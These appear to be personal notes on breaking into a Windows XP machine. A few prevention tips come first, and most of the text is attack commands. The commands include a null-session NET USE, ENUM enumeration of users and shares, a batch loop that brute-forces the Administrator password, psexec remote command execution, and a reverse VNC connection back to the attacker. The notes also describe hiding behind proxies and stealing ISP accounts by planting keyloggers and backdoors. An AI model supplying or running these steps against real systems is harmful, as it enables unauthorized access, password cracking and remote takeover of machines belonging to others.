hack my own winxp
PREVENTION: strong password (at least 3 of 4 character types e.g. aA#4 and length > 8) disable netbios ssn only allow local users permissions to drives/files (not anonymous!) account lockout after a number of failed attempts change password regularly (at most 3 months)
languard (free port scanner) 135 epmap 139 netbios-ssn 445 microsoft-ds
they would first want to hide their own IP address so they would use Wingates, anonymous proxies, and someone else's ISP account. One way to get a ISP account is to acquire an ISP user's account info. For example, when a hacker cracks the SMB service from some AOL user they can then upload keystroke loggers and other backdoor programs that will get them the info they need.
NET USE \nnn.nnn.nnn.nnn\ipc$ "" /u:"" //results in the "the command completed..."
The syntax for enumerating the remote user account and share info is ENUM -U -S -d nnn.nnn.nnn.nnn
if you have discovered the username then proceed to crack the password
e.g. for /f "tokens=1" %%a in (pswdfile.txt) do net use * \nnn.nnn.nnn.nnn\c$ /user:"Administrator" %%a
SSH on a single port could simplify matters...
a script to enable telnet? how was it run remotely?
psexec \nnn.nnn.nnn.nnn cmd.exe //requires admin rights, see above
ipconfig netstat -a tasklist
download the binary (zip version) of uvnc
On the "local" machine run vncviewer.exe -listen
On the remote machine run
winvnc.exe -connect ipaddress // do we need ::5500?